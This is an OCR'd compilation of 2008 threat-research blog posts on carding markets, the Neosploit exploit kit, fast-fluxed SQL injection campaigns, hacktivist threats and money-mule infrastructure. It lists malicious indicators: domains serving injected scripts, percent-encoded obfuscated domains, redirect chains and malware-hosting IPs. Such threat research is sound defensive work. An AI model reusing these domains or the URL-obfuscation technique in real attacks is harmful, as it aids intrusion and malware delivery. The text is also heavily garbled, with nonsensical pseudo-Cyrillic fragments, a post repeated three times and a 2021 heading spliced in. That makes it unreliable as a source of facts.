[3]A recently released report by Finjan, with whom I’ve been on the same page of sev- 
eral high profile incidents so far, [4]touches this very same topic : 


"Prices charged by cybercriminals selling hacked bank and credit card details have fallen 
sharply as the volume of data on offer has soared, forcing them to look elsewhere to boost 
profit margins, a new report says. Researchers for Finjan, a Web security firm, said the 
high volumes traded had led to bank and credit card information becoming "commoditized" 
- account details with PIN codes that once fetched $100 or more each might now go for 
$10 or $20. In its latest quarterly survey of Web trends, the California-based company said 
cybercrime had evolved into "a major shadow economy ruled by business rules and logic that 
closely mimics the legitimate business world." 


Excluding the presence of [5]price discrimination for a while, as well as open topic of- 
fers in the lines of "how much for X amount of Y?" answered as "how much are you willing to 
pay?", it’s all a matter of the seller in a particular situation. 
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STO TexHOnorMM 4 xaKepCTBO. STO NoxOxRe Ha Npaszy, 
Wo kuGepGesonacvoctb ropaano Gonee wxpocas 
cthepa. Sto oTpacnb 3HaHMA NO ynpasneHMi0 pucxamn, 


KOTOPHIG MOTYT BOSHMKATS Np HCNON>SOBaHHK 
TexHOnorMaA Dns pewexns Kaxnx-nvGo sanay. Sto 
O3Ha420T, 4TO CNeUMAN>HOCTH 8 GesonacHocTH MoryT 


CWibHO PAINMYATECA OT YIKOCNOUMANMSMPOBAHHbix 
AO PyKOBOACTBA BeACWerO 3BEHA, OT ayANTAa 20 
KOMMBIOTEPHOR KDHMMHANMCTHKH 
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MOHATD, KAKWe BMAD PaboTH! ECTe B STOR wHAyCTpHM 
Visywwte caith ana nowcxa pabote 4 walima 
NEPCOHANA HA BAWEM NOKANbHOM PbINKe THY LA 
Nowraare 2orxHocTHbIe OGR3aHHOCTH, NoRMuTe 
OTA MEXLY CN@UMANMHOCTAMM, KaKMMM 
HasbiKaMy KBaNMC>YKALIMAMM HyXHO OGnanaTD 


NlorestaATech NOHATD, KAKHE CHeUMabHOCTH Bam 
WHTEDECHL! HA CTApTe Kapbepn!, vem Obi Bbi xOTenn 
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MNADWOrO aHANTMKa Gesonacnoc™ AO pyxososAMTenr 
NO HHCDOPMAaLIMOHHOR GesonacHoc™ (CISO) 
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Furthermore, in real-life market there’s always the scarcity problem, however, in the un- 
derground market there’s no shortage of resources despite the ever growing wants of the 
buyers. Generalizing even more, take for instance the butterfly effect of a price change in 
petrol, and result of which is inevitable increase of prices in every single aspect of your life, 
but in the underground market mostly due to the malicious economies of scale achieved, a 
price increase in renting a botnet would have no effect in the prices charged for the stolen 
credit card details obtained through the infected hosts. How come? Basically, the price and 
resources for malware infection are prone to decrease, if we take a malware infected host as 
a static foundation for the basis of any upcoming cybercrime activities using it. 


Perhaps the most disturbing part is that the market for stolen credit card details is so 
mature, and its entry barriers so low these days, that the confidential data that cannot be 
efficiently obtained through real-life means like credit card cloning or ATM skimming on a large 
scale, is now purchased online for the purpose of abusing it in real-life by[6] embedding the 
valid information into plastic cards. 


A 
2 

3 

4 

5. 
6. 


ttp://ddanchev. blogspot .com/2008/06/price-discrimination-in-market-for.htm 


ttp://blog.wired.com/27bstroke6/2008/06/citibank-atm-se.htm 


4.7.17 The Neosploit Malware Kit Updated with Snapshot ActiveX Exploit 
(2008-07-15 21:43) 


1676 


16735 


16736 


16737 


16738 


16739 


16740 


Neosploit Change Log = 


16 April 2007 

- new exploit module added 
- removed ANI exploit 

- fixed crypt algorithm 


11 April 2007 
- new exploit module added ha 


Username: | 


Password: | | 


| Login | 


Raising [1]Symantec’s ThreatCon based on a newly introduced exploit within a (random) copy 
of a popular web malware exploitation kit? Now that’s interesting given that there are other 
modified versions of the publicly available malware kit empowered with exploits as they get 
released, the single most logical move a administrator of such kit would do is diversity the 
exploits set as often as possible, keeping it up to date - like they do. ThreatCon is raised 
already : 


"Symantec honeypots have captured further exploitation of the Snapshot Viewer for Mi- 
crosoft Access ActiveX Control Arbitrary File Download Vulnerability (BID 30114). Before this 
event, this exploit was known to be used only in isolated attacks. Further analysis of these hon- 
eypot compromises has revealed that the exploit has been added to a variant of the neosploit 
exploit kit, it will very likely reach a larger number of victims. This version will compromise 
vulnerable English versions of Microsoft Windows by downloading a malicious application into 
the Windows Startup folder. Computers that have Microsoft Access installed are potentially 
affected by this vulnerability. Customers are advised to manually set the kill bit on the follow- 
ing CLSIDs until a vendor update is available: FOE42D50-368C-11D0-AD81-00AOC90DC8D9 
FOE42D60-368C-11D0-AD81-00AO0C90DC8D9 F2175210-368C-11D0-AD81-00A0C90DC8D9" 
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Fusil-wizzard 


Fusi-zzuf 
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Why based on a random copy of the kit? Well, the Neosploit malware kit itself is a com- 
modity despite it’s publicly announced varying price in the thousands, it leaked for public 
use just like MPack and Icepack did originally, making statements on the exact type of the 
vulnerabilities included within a bit pointless, since it will only cover the the exploits included 
in a particular version only. Web malware exploitation kits are very modular, namely, anyone 
can introduce new exploits, and tweak them, which is what they’ve been doing for a while, 
mostly converging third party traffic management systems with the malware kits in order to 
improve both, the metrics, and the evasive practices used for making a particular campaign a 
bit more time consuming to analyze. 


Just like the innovations introduced within open source malware, and their [2]localiza- 
tions to native languages, the open source nature of web malware exploitation kit can result 
in countless number of variants whose new features make it sometimes difficult to assess 
whether or not it’s a modified kit or an entirely new one - depending on the sophistication of 
the features of course. The introduction of new exploits within a copy of a particular malware 
kit should be considered as something logical, and if it’s that big a deal, there are many other 
web malware exploitation kits whose features turn Neosploit into the "outdated choice" for 
malicious attackers. 


Related posts: 

[3]The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw 
[4]The Small Pack Web Malware Exploitation Kit 

[5]Crimeware in the Middle - Zeus 

[6]The Nuclear Grabber Kit 

[7]The Apophis Kit 


[8]The FirePack Exploitation Kit Localized to Chinese 


[9]MPack and IcePack Localized to Chinese 


[10]The FirePack Exploitation Kit - Part Two 
[11]The FirePack Web Malware Exploitation Kit 
[12]The WebAttacker in Action 


[13]Nuclear Malware Kit 
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[14]The Random JS Malware Exploitation Kit 
[15]Metaphisher Malware Kit Spotted in the Wild 

[16]The Black Sun Bot 

[17]The Cyber Bot 

[18]Google Hacking for MPacks, Zunkers and WebAttackers 


[19]The IcePack Malware Kit in Action 
. http://www.symantec.com/security_response/threatcon/index. jsp 


http: //ddanchev.blogspot.com/2008/05/icepack-exploitation-kit-localized-to.htm 


_http://adanchey. blogspot .con/2008/06/zeus~crimevare-kit=Vulnerable-to. tml 
http: //ddanchev. blogspot . com/2008/05/small-pack-web-malware-exploitation-kit.htm 
_http://adanchey blogspot .con/2008/04/crinevare~in-niddie-zeus. html 
_http://adanchey. blogspot. con/2006/11/muclear~grabber~ toolkit. htal 


http: //ddanchev. blogspot .com/2008/02/rbns-phishing-activities .htm 
ttp://ddanchev.blogspot.com/2008/05/firepack-exploitation-kit-localized-to.htm 


ttp://ddanchev.blogspot.com/2007/10/mpack-and-icepack-localized-to-chinese.htm 
. http://ddanchev. blogspot .com/2008/04/firepack-exploitation-kit-part-two.htm 
. http://ddanchev. blogspot .com/2008/02/firepack-web-malware-exploitation-kit.htm 


12. http://ddanchev. blogspot .com/2007/05/webattacker-in-action.htm 
13. http://ddanchev. blogspot .com/2007/08/nuclear-malware-kit .htm 


. http://ddanchev. blogspot .com/2008/01/random- js-malware-exploitation-kit .htm 

. http://ddanchev. blogspot .com/2007/11/metaphisher-malware-kit-spotted-in-wild.htm 
ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 
ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


18. http://ddanchev. blogspot .com/2007/09/google-hacking- for-mpacks-zunkers-and.htm 


. http://ddanchev. blogspot .com/2007/07/icepack-malware-kit-in-action.htm 


4.7.18 Obfuscating Fast-fluxed SQL Injected Domains (2008-07-17 09:28) 
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It’s all a matter of how you put it, and putting it like represents a good example of tactical 
warfare, namely, combining different tactics for the sake of making it harder to keep track 
of the impact of a particular SQL injection campaign. Consider the following examples of 
obfuscated domains, naturally being in a fast-flux in the time of the SQL injection that several 
Chinese script kiddies were taking advantage of : 
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6b %6b %36 %2e %75 %73 - kk6.us 

%73 %61 %79 %38 %2E %75 %73 - s.see9.us 

%66 %75 %63 %6B %75 %75 %2E %75 %73 - fuckuu.us 

%61 %2E %6B %61 %34 %37 %2E %75 %73 - a.ka47.us 

%61 %31 %38 %38 %2E %77 %73 - al88.ws 

%33 %2E %74 %72 VYEF %6A %61 %WGE %38 %2E %63 %EF %6D - 3.trojan8.com 


%6D %31 %31 %2E %33 %33 %32 %32 %2E WOF %72 %67 - M11.3322.0rg 


As always, these obfuscations are just the tip of the iceberg considering the countless 
number of other URL obfuscations techniques that spammers and phishers used to take 
advantage of on a large scale. For the time being, one of the main reasons we’re not seeing 
massive SQL injections using such obfuscations is mostly because the feature hasn’t been 
implemented in popular SQL injectors for copycat script kiddies to take advantage of. However, 
with the potential for evasion of common detection approaches, it’s only a matter of personal 
will for someone to add this extra layer to ensure the survivability of the campaign. 
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The folks behind these obfuscations are naturally [1]multitasking on several different under- 
ground fronts. Take for instance 3.trojan8.com (58.18.33.248) also responding to w2.xnibi.com 
which is also injected at several domains, w2.xnibi.com/index.gif to be precise. The fake .gif 
file in the spirit of [2]fake directory listings for acquiring traffic in order to serve malware, is 
actually attempting to exploit a RealPlayer vulnerability - JS/RealPlr.LB!exploit. The deeper 
you go, the uglier it gets. 


Related posts: 

[3]Yet Another Massive SQL Injection Spotted in the Wild 

[4]Malware Domains Used in the SQL Injection Attacks 

[5]SQL Injection Through Search Engines Reconnaissance 

[6]Google Hacking for Vulnerabilities 

[7]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
[8]Sony PlayStation’s site SQL injected, redirecting to rogue security software 


[9]Redmond Magazine Successfully SQL Injected by Chinese Hacktivists 


http: //ddanchev. blogspot . com/2008/06/underground-multitasking-in-action.htm 
http: //ddanchev. blogspot. com/2008/04/fake-directory-listings-acquiring.htm 
http: //ddanchev. blogspot. com/2008/05/yet-another-massive-sql-injection.htm 


http: //ddanchev. blogspot . com/2008/05/malware-domains-used-in-sql-injection.htm 


Siew Ne 


http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines .htm 


1681 


16783 


16784 


16785 


16786 


16790 


16791 


16792 


6. bttp: //ddanchev. blogspot .com/2007/05/google-hacking-for-vulnerabilities.htm 
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4.7.19 The Unbreakable CAPTCHA (2008-07-17 22:36) 
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@ Download vs Cogent 
@ Download vs Cogent ais 


z @ Dowricad via Goteirossing 
@ Download via GeobaiCrossing 


@ Download wa Telegiote 
@ Download wa Telegiode = 


© Download wa TetaSonera #2 
© Download via TetaSenera #2 


© Devsieed vie Lewich @ Download va Levels) 
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@ Cowntoad vis Leven #3 


@ Oownload vis Levey) #4 


@ Oowntosd vis Leven 62 
@ Oownload vis Levexy 63 
@ Oownload vis Levens) #¢ 


@ Download wa GodaiCrossing #2 
@ Download wa GiodarCrossing #2 ‘ 


0 c * 
@ Download via Copert #2 © Cownioss via Copent #2 
@ Download via TelaSonera 
@ Download via TetaSeners 
No premium user, 
No premium user, o 
2n+1 3 
=> 1 cheek Geom (%) “35-3 dizisinin kagincs terim! 3 tir? 
2k + Dux-'7 (rod x) Genkipind aapieyen kag tane 
= GeQert verde? 


aa 
——— = 


In response to [1]the continuing evidence of how spammers are efficiently [2]breaking the 
CAPTCHAs of popular free email service providers in order to abuse their clean IP reputation, 
and already validated authenticity through the use of [3]DomainKkKeys and SenderlID frame- 
works, someone has finally came up with an unbreakable CAPTCHA. 


If it only weren’t a hoax, it would have even solved the [4Jhuman CAPTCHA solvers problem, 
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KomnbwTep 4 CHCTeMa 
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whose [5]sessions would have probably expired due to their inability to solve it. 


Related posts: 

[6]Vladuz’s Ebay CAPTCHA Populator 
[7]Spammers and Phishers Breaking CAPTCHAs 
[8]DIY CAPTCHA Breaking Service 


[9]Which CAPTCHA Do You Want to Decode Today? 


. http://blogs .zdnet.com/security/?p=1232 

. http://blogs.zdnet .com/security/?p=1418 

. http://blogs.zdnet .com/security/?p=147 

. http://www. guardian.co.uk/technology/2006/nov/23/comment .comment2 


. http://www. theregister . co.uk/2008/03/14/captcha_serfs/ 

. http: //ddanchev. blogspot . com/2007/03/vladuzs- ebay-captcha-populator .htm] 

. http://ddanchev. blogspot .com/2007/09/spammers-and-phishers-breaking-captchas.htm 
. http: //ddanchev . blogspot . com/2007/10/diy- captcha~ breaking-service html 

. http: //ddanchev.. blogspot . com/2007/11/which- captcha-do- you-want~to-decode. html 
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4.7.20 The Ayyildiz Turkish Hacking Group VS Everyone (2008-07-18 11:35) 
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Certain hacktivist groups often come and go by the time the momentum of their particular 
cause is long gone. Excluding the hardcore hacktivists who are obliged to defend their 
country’s infrastructure and reputation on the international scene, smart enough to do on one 
front, there are certain hacktivist groups who ensure their future existence by declaring war 
and every single country that has ever made statements in contradiction with their vision. 
Quite a stimulating factor for ensuring the future of your script kiddies group, isn’t it? 


One of these groups is the AYYILDIZ TEAM, a group of Turkish script kiddies who’ve been pretty 
active as of recently, targeting everyone, everywhere, leaving statements like the following : 


"Me, as AYT-Admin Barbaros, swear to everything which is lovely and holy to me, that you will 


pay for your actions. We, AYT, as a Cyber Attacking Army will make it sure. Read right, what 
will we do: 


The government websites will be inaccessible an all lawsuits will be manipulated 


* We will infiltrate the server of inland revenues for the manipulation of the data which 
are there. 
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efmaneKo OT BOMONAAOB - ECTb TOUKA - FPaHnNua THEX CTpaH - YpyrsBaxr, ApreHTuHpl u 
asvNnnn, MUNOBUAHOE MECTO MYTKO NONYAAPHOES Y MECTHbIX MuTeNeHW. 


Ha cnegyoustii Merb MbI NONETeNst B NeiNbHbIt aNpeccieHEst Pro. Bpemerat 4a BCAKNe QONONHHTeENbHBIe NplaNOversA He Gbin0, KONA HAC BbICAQINN BONE 
AOMNKS Ha TOPE, MEA CKAIANS, 4TO “Thi NPeAyNpeanan, vTo GyET NNOKO, WO A HE Ayana “TO HAC TONDKO". DTO NoKa Oa HE NOCEM~ewCh, a KOMMa NocEenmnacy. 
BCE y HEE CTANO XOPOWO, BEQb 37a fOpa KaK Pas C NaMATHMKOM XpHCTy) 
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* At the same time we will insist into the server of banks and will care for chaos 
* Websites of the press will be extinguished. 


* If the offence of our prophet (s.a.v.) called your press freedom, we will show you this 
press freedom 


* Websites of divers shops will be hacked. Databank information’s and the dates which 
are there, for example credit card dates, will be policed in this page. (Don’t worry, we wouldn’t 
taste one cent of your moneys, we aren’t thieves like you. However we don’t take care of 
what happens, if other hackers see this dates and empty your account)" 


Index / IP Address Host Name Original Name 
cliprts.com bkpadd. mobi 
cliprts.com iprts.com 
cliprts.com 
cliprts.com cliprts.com 
cliprts.com cliprts.com 
cliprts.com cliprts.com 
cliprts.com cliprts.com 
cliprts,com cliprts.com 
cliprts.com cliprts.com 
cliprts.com cliprts.com 


24,141,121. i cliprts.com 
98,195.146.28 c-98-15 cliprts.com 
190.72,14,227 90-72 cliprts.com 
70,132,133,54 ppp-70 54.dsl.hstntx.swbell.net cliprts.com 

host-72-51-136-200, newwavecomm.net cliprts.com 


501060080c6fe6b29. va, shawcable.net cliprts.com 
cliprts.com bkpadd, mobi 
cliprts.com bkpadd, mobi 
cliprts.com bkpadd, mobi 
cliprts.com bkpadd, mobi 
cliprts.co bkpadd, mobi 
190-72-14-227.dyn.dsl.canty.net bkpadd. mobi 
c-98-195-146-28, hsd1.tx.comcast.net bkpadd. mobi 
cliprts.com bkpadd, mobi 
501060080c6Fe6b29, va, shawcable.net bkpadd, mobi 
cliprts.com bkpadd, mobi 
bkpadd. mobi 
bkpadd, mobi 
cliprts.com bkpadd. mobi 
Ipp-70-132-133-54.dsl.hstntx.swbell.net bkpadd. mobi 


While this may sound inspiring, some of the group’s members are also involved in SQL 
injections in between the web site defacements, which are naturally done by exploiting web 
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application vulnerabilities. For instance, right after the defacement messages, they are also 
injecting the following fast-fluxed domains, part of the latest wave of SQL injections attacks. 


bkpadd.mobi /ngg.js 
usaadw.com /ngg.js 


cliprts.com /ngg.js 


They are monetizing their defacements by either compiling lists of sites known to be 
SQL injectable since they’ve managed to defaced them, then reselling these to the SQL 
injectors, or are in fact part of the whole process in this scammy ecosystem. Speaking of SQL 
injections, here’s the most recent list of fast-fluxed SQL injected domains participating in the 
last wave that I’ve been keeping track of for a while : 


pyttco .com/ngg.js 
butdrv .com/ngg.js 
gitporg .com/ngg.js 
brcporb .ru/ngg.js 
korfd .ru/ngg.js 
adwnetw .com/ngg.js 
wowofmusiopl .com.cn/456.js 
adwbn .ru/ngg.js 
btoperc .ru/ngg.js 
nudk .ru/ngg.js 
bkpadd .mobi/ngg.js 
cliprts .com/ngg.js 
adwr .ru/ngg.js 

bnrc .ru/ngg.js 


adpzo .com/ngg.js 
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*° CARDTWE-roretot 5. ws 


Stay tuned! 


17.9.25 Shots from the Wild West - Random Cybercrime Ecosystem Screenshots 
2021 - An OSINT Analysis - Part Five (2021-09-30 03:13) 


An image is worth a thousand words. 
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[10] 
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iogp .ru/ngg.js 
lodse .ru/ngg.js 
usabnr .com/ngg.js 
vcre .ru/ngg.js 

sdkj .ru/ngg.js 
rcdpic .ru/ngg.js 
7maigol .cn/ri.js 
j8heisi .cn/ri.js 
usaadp .com/ngg.js 
gbradp .com/ngg.js 
cdrpoex .com/ngg.js 
rrcs .ru/ngg.js 
gbradw .com/ngg.js 
hiwowpp .cn/ri.js 
cdport .eu/ngg.js 
nopcls .com/ngg.js 
loopadd .com/ngg.js 
tertad .mobi/ngg.js 
gbradde .tk/ngg.js 
tctcow .com/ngg.js 
ausbnr .com/ngg.js 
movaddw .com/ngg.js 
grtsel .ru/ngg.js 
sslwer .ru/ngg.js 


destad .mobi/ngg.js 
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[14] 
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[15] 
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[18] 
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hdrcom .com/ngg.js 
addrl .com/ngg.js 

porttw .mobi/ngg.js 
bnsdrv .com/ngg.js 
drvadw .com/ngg.js 
crtbond .com/ngg.js 


usaadw .com/ngg.js 


What used to be plain simple cooperating among every single participant in the under- 
ground marketplace, seems to be evolving into long-term business relationships. 


Related posts: 

[1]Monetizing Compromised Web Sites 

[2]Monetizing Web Site Defacements 

[3]Underground Multitasking in Action 

[4]Right Wing Israeli Hackers Deface Hamas's Site 
[5]Pro-Serbian Hacktivists Attacking Albanian Web Sites 
[6]The Rise of Kosovo Defacement Groups 

[7]A Commercial Web Site Defacement Tool 

[8]Phishing Tactics Evolving 

[9]Web Site Defacement Groups Going Phishing 
[10]Hacktivism Tensions 

[11]Hacktivism Tensions - Israel vs Palestine Cyberwars 
[12]Mass Defacement by Turkish Hacktivists 


[13]Overperforming Turkish Hacktivists 
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HosposenaH”Ackue HpaBbi 
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TaKOW SHAKOMbIN VW AaNeKuM B NOCNegHee BpeMA Bug 
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http: //ddanchev. blogspot . com/2008/07/monetizing-compromised-web-sites.htm 


. http://ddanchev.blogspot.com/2008/06/monetizing-web-site-defacements.htm 


http: //ddanchev. blogspot. com/2008/06/underground-multitasking-in-action.htm 
http://ddanchev. blogspot . com/2008/06/right-wing-israeli-hackers-deface.htm 


http: //ddanchev.blogspot.com/2008/05/pro-serbian-hacktivists-attacking .htm 
| 
| 

10. 


11. http://ddanchev. blogspot .com/2006/07/hacktivism-tensions-israel-vs.htm 
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12. http://ddanchev. blogspot .com/2007/11/mass-defacement-by-turkish-hacktivists.htm 


13. http://ddanchev. blogspot .com/2007/11/overperforming-turkish-hacktivists.htm 


4.7.21 Money Mule Recruiters use ASProx’s Fast Fluxing Services (2008-07-18 12:48) 
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Just consider this scheme for a second. A well known [1]money mule recruitment site Cash 
Transfers is maintaining a fast-flux infrastructure on behalf of the Asprox botnet, that is also 
providing hosting services for several hundred domains used on the last wave of SQL injection 
attacks. Ironically, [2]the money mule recruitment site is sharing IPs with many of them. 


1689 


[35] 
16867 


[36] 


16868 


WEB. 


Mbi KOMaHna Mpoeccnonanos c MHOrONneTHMM ONbITOM 
co3naHHMA Be6-cahTos pasHow CnomMHOCTH. 


Mui perpeGormenes, commeem # Damyensem NpoenTe 


Ana OusHece wa noGow cepa: aewtemanoct 


Marasun Caer - ouautKa 


are ome pal orammen 


[37] 
16869 


_ 


= 
r 
= 
= 
_ 
He 


epesAsw 


Hekorfa yenewne a, c 


DCT SyAb! PaGoTawT TONDKO HA BRINOC, CHAETS Oxy THM HENDIA. B KpyTexe DeweneGenvnex pecropanax COpauaseunca kK NepCconany AaxKe u3 3a CTONa - 6e3 macnn Ha 
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XBATUNG GaraxKHbix CYMOK Hi NO BECy Kit NO OOLEMY, If A PACCUHITRIBAN NPMKYNMTS QOMONHHTENDHEIM 4yMaQSH B SIPONOPTy, HO B MTOTe NONYYMN Ouacko) MeHA Qaxe 
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Who are these money launderers (cashtransfers.tk; cashtransfers.eu; type53.eu; sid57.tk; 
catdbw.mobi; cdrpoex.com etc. ) anyway? 


"Cash-Transfers Inc. is an online-to-offline international money transfer service. We of- 
fer a secure, fast, and inexpensive means of sending money from the UK to offline recipients 
worldwide. Recipients do not require a bank account or Internet connection to receive funds. 
We have teamed with select local disbursement partners to provide a convenient, secure, and 
cost-effective means of sending money to family, friends and business partners abroad. The 
basic requirements to send money/transfer money are: 


1) Senders must have Internet access and a bank account or credit/debit card to trans- 
fer money. However, recipients do not require either a bank account or Internet connection. 


2) Money sent through Cash-Transfers Inc. is available for pick up at the distribution 
partner instantly, or, in most countries, money can be delivered to the recipient in a matter of 
hours. 


3) Our local agents will call your recipient (during local business hours) to provide addi- 
tional details, including: forms of identification required, hours of operation, and other 
locations. The sender will also receive an email confirmation with transaction details and 
tracking information." 


Index IP Address Host Name Original Name 


», 169,107 


4.dsl.hstntx.swbell. net 


74,socal.res.rr.com 
74 st, bredbandsbolaget... 
avecomm,net 


cliprts. 


The fast-flux infrastructure they’re currently using is also providing services to domains that 
are currently used, or have been used in previous SQL injection attacks. Some info on the 
current DNS servers used in the fast-flux : 


ns10.cashtransfers.tk 
ns11.cashtransfers.tk 
nsl.cashtransfers.tk 
ns12.cashtransfers.tk 
ns2,cashtransfers.tk 
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ns13.cashtransfers.tk 
ns3.cashtransfers.tk 
ns14,cashtransfers.tk 
ns4.cashtransfers.tk 
ns15.cashtransfers.tk 
ns5.cashtransfers.tk 
ns16.cashtransfers.tk 
ns6.cashtransfers.tk 
ns17.cashtransfers.tk 
ns7.cashtransfers.tk 
ns8.cashtransfers.tk 


With the distributed and dynamic hosting infrastructure courtesy of the malware infected user, 
scammers, spammers, phishers and malware authors are only starting to experiment with the 
potential abuses of such an underground ecosystem build on the foundations of compromises 
hosts. 


Related posts: 

[3]Storm Worm’s Fast Flux Networks 

[4]Managed Fast Flux Provider 

[5]Fast Flux Soam and Scams Increasing 

[6]Fast Fluxing Yet Another Pharmacy Spam 

[7]Obfuscating Fast Fluxed SQL Injected Domains 

[8]Storm Worm Hosting Pharmaceutical Scams 

[9]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 


. http://www.docep.wa.gov.au/ConsumerProtection/scamnet/Scams/Cash-Transfers_Inc.htm 
. http: //www.banksafeonline.org.uk/moneymule_explained. htm 

. http: //ddanchev. blogspot .com/2007/09/storm-worms-fast-flux-networks.htm 

. http://ddanchev. blogspot .com/2007/11/managed-fast-flux-provider.htm 

. http: //ddanchev.blogspot .com/2007/10/fast-f1lux-spam-and-scams- increasing. html 

. http: //ddanchev.blogspot .com/2007/10/fast-fluxing-yet-another-pharmacy-scam.htm 

. http://ddanchev. blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected.htm 


. http: //ddanchev.blogspot .com/2008/05/storm-worm-hosting-pharmaceutical-scams.htm 


. http: //blogs.zdnet .com/security/?p=1122 
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4.7.22 Money Mule Recruiters use ASProx’s Fast Fluxing Services (2008-07-18 12:48) 


CASH TRANSFERS INC, > 


Just consider this scheme for a second. A well known [1]money mule recruitment site Cash 
Transfers is maintaining a fast-flux infrastructure on behalf of the Asprox botnet, that is also 
providing hosting services for several hundred domains used on the last wave of SQL injection 
attacks. Ironically, [2]the money mule recruitment site is sharing IPs with many of them. 
Who are these money launderers (cashtransfers.tk; cashtransfers.eu; type53.eu; sid57.tk; 
catdbw.mobi; cdrpoex.com etc. ) anyway? 


"Cash-Transfers Inc. is an online-to-offline international money transfer service. We offer a 
secure, fast, and inexpensive means of sending money from the UK to offline recipients 
worldwide. Recipients do not require a bank account or Internet connection to receive funds. 
We have teamed with select local disbursement partners to provide a convenient, secure, 
and cost-effective means of sending money to family, friends and business partners abroad. 
The basic requirements to send money/transfer money are: 
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1) Senders must have Internet access and a bank account or credit/debit card to trans- 
fer money. However, recipients do not require either a bank account or Internet connection. 


2) Money sent through Cash-Transfers Inc. is available for pick up at the distribution 
partner instantly, or, in most countries, money can be delivered to the recipient in a matter of 
hours. 


3) Our local agents will call your recipient (during local business hours) to provide addi- 
tional details, including: forms of identification required, hours of operation, and other 
locations. The sender will also receive an email confirmation with transaction details and 
tracking information." 


Index - IP Address Host Name Original Name 


3-54.dsl.hstntx.swbell.net 


e6s.tr.com 


cust, bredbandsbolaget... 


omm.net 


The fast-flux infrastructure they’re currently using is also providing services to domains that 
are currently used, or have been used in previous SQL injection attacks. Some info on the 
current DNS servers used in the fast-flux : 


ns10.cashtransfers.tk 
ns11.cashtransfers.tk 
ns1,.cashtransfers.tk 


ns12,.cashtransfers.tk 
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ns2.cashtransfers.tk 
ns13.cashtransfers.tk 
ns3.cashtransfers.tk 
ns14.cashtransfers.tk 
ns4.cashtransfers.tk 
ns15.cashtransfers.tk 
ns5.cashtransfers.tk 
ns16.cashtransfers.tk 
ns6.cashtransfers.tk 
ns17.cashtransfers.tk 
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With the distributed and dynamic hosting infrastructure courtesy of the malware infected user, 
scammers, Spammers, phishers and malware authors are only starting to experiment with the 
potential abuses of such an underground ecosystem build on the foundations of compromises 
hosts. 


Related posts: 

[3]Storm Worm’s Fast Flux Networks 
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[5]Fast Flux Soam and Scams Increasing 

[6]Fast Fluxing Yet Another Pharmacy Spam 
[7]Obfuscating Fast Fluxed SQL Injected Domains 
[8]Storm Worm Hosting Pharmaceutical Scams 


[9]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
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4.7.23 Money Mule Recruiters use ASProx’s Fast Fluxing Services (2008-07-18 12:48) 
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ABOUT COMPANY VACANCES OUR SERVE, faa CONTACTS, 
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CASH TRANSFERS INC, 


— 
Welcome to our cash-transfers.com 


the best e-solotions os rhe eet 


Wis we are? 
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Just consider this scheme for a second. A well known [1]money mule recruitment site Cash 
Transfers is maintaining a fast-flux infrastructure on behalf of the Asprox botnet, that is also 
providing hosting services for several hundred domains used on the last wave of SQL injection 
attacks. Ironically, [2]the money mule recruitment site is sharing IPs with many of them. 
Who are these money launderers (cashtransfers.tk; cashtransfers.eu; type53.eu; sid57.tk; 
catdbw.mobi; cdrpoex.com etc. ) anyway? 


1695 


[94] 


[95] 


16923 


YtTpeHHee Yukaro 


[96] 
16924 


me 


ed move 
7 © we @ & wee 
ee, on ho 
or re ee we 


ee 


x4 
* eae 


eeee. ° 


[97] 


16925 


[98] 


16926 


[99] 


16927 


[104] 
16931 


[105] 


16932 


"Cash-Transfers Inc. is an online-to-offline international money transfer service. We of- 
fer a secure, fast, and inexpensive means of sending money from the UK to offline recipients 
worldwide. Recipients do not require a bank account or Internet connection to receive funds. 
We have teamed with select local disbursement partners to provide a convenient, secure, and 
cost-effective means of sending money to family, friends and business partners abroad. The 
basic requirements to send money/transfer money are: 


1) Senders must have Internet access and a bank account or credit/debit card to trans- 
fer money. However, recipients do not require either a bank account or Internet connection. 


2) Money sent through Cash-Transfers Inc. is available for pick up at the distribution 
partner instantly, or, in most countries, money can be delivered to the recipient in a matter of 
hours. 


3) Our local agents will call your recipient (during local business hours) to provide addi- 
tional details, including: forms of identification required, hours of operation, and other 
locations. The sender will also receive an email confirmation with transaction details and 
tracking information." 


Index IP Address Hast Name Original Name 
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The fast-flux infrastructure they’re currently using is also providing services to domains that 
are currently used, or have been used in previous SQL injection attacks. Some info on the 
current DNS servers used in the fast-flux : 
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With the distributed and dynamic hosting infrastructure courtesy of the malware infected user, 
scammers, spammers, phishers and malware authors are only starting to experiment with the 
potential abuses of such an underground ecosystem build on the foundations of compromises 
hosts. 
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[3]Storm Worm’s Fast Flux Networks 


[4]Managed Fast Flux Provider 
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4.7.24 SQL Injecting Malicious Doorways to Serve Malware (2008-07-21 06:41) 
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Abusing legitimate sites as redirectors to malicious doorways serving malware is becoming 
increasing common, as is the use of SQL injections in order for the malicious parties to ensure 
their campaigns will receive enough generic traffic to their redirectors. Excluding the use of 
the very same traffic management tools, web malware exploitation kits, [1]templates for the 
rogue adult sites and the rogue security software, perhaps the most important thing to point 
out regarding all of the previously analyzed such campaigns, is that they are all related to one 
another, and are operated by the same people, using the very same infrastructure and live 
exploit URLs most of the time. 


Let’s expose yet another such campaign, that has been SQL injected and spammed across a 
couple of hundred web forums. gpamelaaandersona .info (82.103.129.98) is the typical com- 
prehensive malicious doorway, whose galleries redirect to tds.zbestservice .info/tds/in.cgi?11 
(85.255.120.45), and from there the following campaigns load on-the-fly : 


porntubev20 .com/viewmovie.php?id=86 (74.50.117.84) 


getmyvideonow .com/exclusive2/id/3912999/2/black/white / - (89.149.194.188) 
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immenseclips .com/m6/moviel.php?id=1552 &n=celebs (85.255.118.156) 
movieexternal .com/download.php?id=1552 (77.91.231.201) 
2008adults2008a .com/freemovie/144/0/ 

avwav .com/1931.htm 

codecupgrade .com (74.50.117.84) 

iwillseethatvideo .com (91.203.92.53) 


dciman32 .com (85.255.120.45) 
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Naturally, these are just the tip of the iceberg, and the deeper you go, the more connections 
with malware gangs and previous campaigns can be established. For instance, here are some 
more "sleeping beauties" at 74.50.117.84 : 


winantivirus2008 .org 
porntubev20 .com 
crack-land .com 
just-tube .com 
codecupgrade .com 
codecupgrade .com 
scanner-tool .com 
surf-scanner .com 
best-cracks .com 
